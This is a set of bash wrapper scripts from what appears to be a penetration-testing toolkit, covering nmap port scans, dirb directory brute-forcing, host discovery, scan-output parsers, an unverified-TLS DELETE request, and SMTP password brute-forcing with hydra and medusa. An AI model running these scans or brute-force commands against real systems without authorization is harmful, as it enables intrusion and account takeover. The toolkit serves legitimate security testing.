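#   <url-file>    line-separated list of URLs to capture
#   <report-dir>  directory name for the report output
#   <user-agent>  User-Agent string for the requests

# Misuse is reported on stderr with a non-zero status.
if [[ $# -ne 3 ]]; then
  echo "Please provide a Line seperated file containing URLs to capture, a Directory name for report output and a User-Agent string." 1>&2
  exit 1
fi

url_file=$1
report_dir=$2
# The third argument was required but never used: the string below was always
# sent. It is now the fallback for an empty argument only.
user_agent=${3:-"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.44"}

eyewitness --web -f "$url_file" --threads 10 --max-retries 2 -d "$report_dir" \
  --user-agent "$user_agent" --no-prompt

--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-scan-web-server.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .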
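#
# For more see the file 'LICENSE' for copying permission.


# Usage: tcp-scan-web-server.sh <target>
# SYN scan of a fixed list of TCP ports with -A detection, host discovery
# skipped (-Pn). Results go to tcp_web_server_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Misuse is reported on stderr with a non-zero status, like the root check.
if [[ $# -ne 1 ]]; then
  echo "Please provide the web server." 1>&2
  exit 1
fi

target=$1
# '/' in the argument would turn the -oA basename into a path; map it to '_'
# for the file name only.
out_base="tcp_web_server_${target//\//_}"

# Quoted so the target reaches nmap as exactly one argument.
nmap -sS -vv -A --osscan-guess --version-all -Pn \
  -p80,81,443,1080,3000,4000,5000,5601,6379,8000,8008,8080,8081,8181,8443,8888,9000,9080,9090,9200,9443,10000,15672 \
  -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/web/dir-scanner-fine-tuned.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.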
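

# Usage: dir-scanner-fine-tuned.sh <url> <user-agent> <http-code-to-ignore>
# Runs dirb against <url> with the seclists big.txt wordlist, the given
# User-Agent (-a) and response code to ignore (-N); output goes to a text file
# named after the URL (-o).

# Misuse is reported on stderr with a non-zero status.
if [[ $# -ne 3 ]]; then
  echo "Please provide the target url, a user agent string and an HTTP code to ignore." 1>&2
  exit 1
fi

url=$1
user_agent=$2
ignore_code=$3
# Log name: runs of '/' and '.' become '_', ':' is dropped, so the URL can
# never act as a path. A private variable is used instead of LOGNAME, which is
# the standard login-name environment variable and would be passed on, changed,
# to dirb.
log_file=$(printf '%s\n' "dirb_big_results_${url}" \
  | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
log_file="${log_file}.txt"

# The User-Agent normally contains spaces; unquoted it was split into several
# arguments and only its first word reached -a.
dirb "$url" /usr/share/seclists/Discovery/Web-Content/big.txt \
  -a "$user_agent" -l -r -S -o "$log_file" -f -N "$ignore_code"

--------------------------------------------------------------------------------
/web/dir-scanner-proxy.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: dir-scanner-proxy.sh <url> <user-agent> <proxy-host> <proxy-port>
# Runs dirb against <url> through the given proxy (-p host:port) with the
# seclists big.txt wordlist; output goes to a text file named after the URL.

# The command uses four values ($3:$4 is the proxy), but the check accepted
# exactly three, so the port was always empty. Four arguments are required now.
if [[ $# -ne 4 ]]; then
  echo "Please provide the target url base, the user agent string and the proxy host and port." 1>&2
  exit 1
fi

url=$1
user_agent=$2
proxy="$3:$4"
# Log name: runs of '/' and '.' become '_', ':' is dropped, so the URL can
# never act as a path. A private variable is used instead of LOGNAME, which is
# the standard login-name environment variable and would be passed on, changed,
# to dirb.
log_file=$(printf '%s\n' "dirb_big_results_${url}" \
  | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
log_file="${log_file}.txt"

# Quoted so a User-Agent with spaces reaches -a as one argument.
dirb "$url" /usr/share/seclists/Discovery/Web-Content/big.txt \
  -a "$user_agent" -l -r -S -o "$log_file" -p "$proxy"

--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-super-fast-scan-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2023 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: tcp-services-super-fast-scan-noping.sh <target> <ports>
#   <ports> is a comma-separated list handed to nmap's -p option.
# SYN scan of the listed ports with -A detection and -T4 timing, host discovery
# skipped (-Pn). Results go to tcp_services_<target>.* (-oA).

# The SYN scan (-sS) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 2 ]]; then
  echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 1>&2
  exit 1
fi

target=$1
ports=$2
# Keep a CIDR '/' out of the output file name (it would be read as a path).
out_base="tcp_services_${target//\//_}"

nmap -sS -vv -A --osscan-guess --version-all -Pn -p"$ports" -T4 --defeat-rst-ratelimit \
  -oA "$out_base" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-super-fast-scan-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.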
34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/services/udp-services-super-fast-scan-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn -p$2 -T4 --defeat-icmp-ratelimit -oA udp_services_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 34 | fi 35 | -------------------------------------------------------------------------------- /grep/grep-list-hosts-open-ports-and-services-to-matrix.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 
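#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Turns the nmap grepable output files (*.gnmap) of a directory into one
# line per host of the form
#   <host>;<field count>;<port>(<service>)[<version>],...
#
# Arguments: $1 - directory that holds the .gnmap files
# Outputs:   the matrix on stdout

if [[ $# -ne 1 ]]; then
  echo "Please provide a directory path." >&2
  exit 1
fi

# The files are read from the directory given as $1, as the sibling
# "-to-txt" script does; previously the argument was required but the glob
# always looked in the current directory.
# -h drops the file-name prefix so the host is field 2 for any path and any
# number of files; '--' keeps a path that starts with '-' from being read
# as a grep option.
#
# Host names and version banners in .gnmap files originate from the
# scanned hosts, so they are passed to printf as data ("%s"), never as
# part of the format string.
# In each port entry v[1] is the port, v[5] the service name and v[7] the
# version string.
# NOTE(review): NF is the number of '_'-separated fields of the line, not
# a count of ports, and a banner containing ',' '/' or '_' will be split
# in the wrong place - confirm the intended value and input assumptions.
grep -Ehv "^#|Status: Up" -- "$1"/*.gnmap \
  | cut -d' ' -f2,4- \
  | sed 's/Ignored.*//g' \
  | sed 's/ /_/' \
  | sed 's/, /,/g' \
  | awk -v FS=_ '{
      printf "%s;%d;", $1, NF
      $1 = ""
      for (i = 2; i <= NF; i++) { a = a "" $i }
      split(a, s, ",")
      for (e in s) {
        split(s[e], v, "/")
        printf "%s(%s)[%s],", v[1], v[5], v[7]
      }
      a = ""
      printf "\n"
    }'

--------------------------------------------------------------------------------
/web/curl-delete.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.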
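#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Sends one HTTP DELETE request through a proxy and prints the response
# including its headers.
#
# e.g. $1 == Accept header
# e.g. $2 == Auth Cookie header
# e.g. $3 == proxy (http://127.0.0.1:8080)
# e.g. $4 == target url

# The usage text now lists the four values the script actually reads; it
# previously also asked for a content-type and post data.
if [[ $# -ne 4 ]]; then
  echo "Please provide Accept header, authorization cookie, proxy server and target url." >&2
  exit 1
fi

# --insecure turns off TLS certificate verification, so the cookie in $2
# is sent without authenticating the peer. That fits a local intercepting
# proxy such as the 127.0.0.1 example above; with any other proxy the
# cookie should be treated as exposed.
# The cookie is passed on the command line, so it is visible in the
# process list and lands in the shell history.
curl -X DELETE \
  --header "$1" \
  --header 'Accept-Language: en' \
  --header "$2" \
  -x "$3" --insecure --include "$4"

--------------------------------------------------------------------------------
/grep/grep-list-hosts-open-ports-and-services-to-txt.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.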
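#
# For more see the file 'LICENSE' for copying permission.

# Prints a plain-text report from the nmap grepable output files (*.gnmap)
# of a directory: per host a "Host:" line, an "Open ports:" line and one
# "<port> <service> <version>" row per port entry.
#
# Arguments: $1 - directory that holds the .gnmap files
# Outputs:   the report on stdout

if [[ $# -ne 1 ]]; then
  echo "Please provide a directory path." >&2
  exit 1
fi

# "$1" is quoted so a directory name with spaces stays one path; -h drops
# the file-name prefix so the host is field 2 for any path, and '--' keeps
# a path that starts with '-' from being read as a grep option.
#
# Host names and version banners in .gnmap files originate from the
# scanned hosts, so they are passed to printf as data ("%s"), never as
# part of the format string.
# NOTE(review): the value printed after "Open ports:" is NF, the number of
# '_'-separated fields of the line, not a count of ports - confirm what
# was intended.
grep -Ehv "^#|Status: Up" -- "$1"/*.gnmap \
  | cut -d' ' -f2,4- \
  | sed 's/Ignored.*//g' \
  | sed 's/ /_/' \
  | sed 's/, /,/g' \
  | awk -v FS=_ '{
      printf "Host: %s\nOpen ports: %d\n", $1, NF
      $1 = ""
      for (i = 2; i <= NF; i++) { a = a "" $i }
      split(a, s, ",")
      for (e in s) {
        split(s[e], v, "/")
        printf "%-10s%-20s%s\n", v[1], v[5], v[7]
      }
      a = ""
      printf "\n"
    }'

--------------------------------------------------------------------------------
/live-hosts/discover-local-live-hosts-netdiscover.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2019 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.


# Runs netdiscover on one interface and range and saves its output to
# local_live_hosts_netdiscover_<device>.txt.
#
# Arguments: $1 - network device
#            $2 - target ip range

# NOTE(review): the message reads like a recommendation, but the script
# stops here when it is not run as root.
if [[ $EUID -ne 0 ]]; then
  echo "For better results, please run this script as root." 1>&2
  exit 1
fi

if [[ $# -ne 2 ]]; then
  echo "Please provide your network device and the target ip range." >&2
  exit 1
fi

# A private variable holds the log file name so that the standard LOGNAME
# environment variable is left untouched. '/' is replaced so the file is
# always created in the current directory.
log_name="local_live_hosts_netdiscover_$1.txt"
log_name=$(printf '%s\n' "$log_name" | sed -E 's/[/]+/_/g')

# Quoted so that neither argument nor the redirect target is word-split or
# glob-expanded while running as root.
netdiscover -i "$1" -r "$2" -s 100 -N -P > "$log_name"



--------------------------------------------------------------------------------
/cracking/brute-force-smtp-medusa.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# NOTE(review): the argument contract of this script is inconsistent and
# is left unchanged here. The guard accepts two arguments; the hydra line
# reads $3 and treats $1 as the login and $2 as the server, the medusa
# line treats $1 as the host and $2 as the port, and the usage text asks
# for three values. The maintainer needs to settle which values are
# expected before the expansions can be quoted.
if [ $# -eq 2 ]; then
  hydra -v -l $1 -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -s $3 -e nsr -o "smtp_$2_$3_hydra.txt" -f smtp://$2
  medusa -v 4 -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -e ns -n $2 -O "smtp_$1_$2_medusa.txt" -M smtp -h $1
else
  echo "Please provide the target email account, the SMTP server and its port."
fi

--------------------------------------------------------------------------------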